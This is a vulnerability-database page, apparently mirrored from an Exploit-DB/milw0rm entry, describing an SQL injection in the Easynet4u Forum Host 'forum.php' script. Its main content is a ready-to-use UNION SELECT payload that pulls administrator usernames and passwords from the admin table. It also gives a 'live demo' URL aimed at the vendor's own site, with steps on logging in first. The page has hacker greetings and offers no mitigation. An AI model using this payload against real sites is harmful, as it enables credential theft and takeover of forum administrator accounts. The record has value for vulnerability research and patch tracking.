Easynet4u Forum Host - 'forum.php' SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1056903 漏洞类型
发布时间 2008-10-10 更新时间 2008-10-10
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/6721
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
############### >>> Remote SQL Injection <<<  #########
##    SuB-ZeRo  CoNsTaTiNe HaCkErS25 walid          ##
################## >>> SuB-ZeRo  <<< ################
 author  :  SuB-ZeRo
 contact :  FbH@hotmail.com
                
 scrit: forumhost
 buy script : http://www.easynet4u.com/easyshop/index.php?do=catalog&c=remotely_hosted_scripts&i=forum_host
 dork       : find it
 exploit:
 www.site.me/forumhost/forum.php?user=demo&forum=-7+union+select+1,concat(username,0x3a,password),3,4+from+admin--
 NoTe:in name of demo put eny user you want
 L!Ve DeMo
 http://www.easynet4u.com/forumhost/forum.php?user=demo&forum=-7+union+select+1,concat(username,0x3a,password),3,4+from+admin--
 NoTe:YoU must singup and login in web sit and you put your exploit
########### Greetz #############
>>> SuB-ZeRo
>>>my best freinds :: x.CJP.X & ach2008 & carlos the jackel & HiSoK4 & bibi-info & crazy-zero
>>> all muslims

# milw0rm.com [2008-10-10]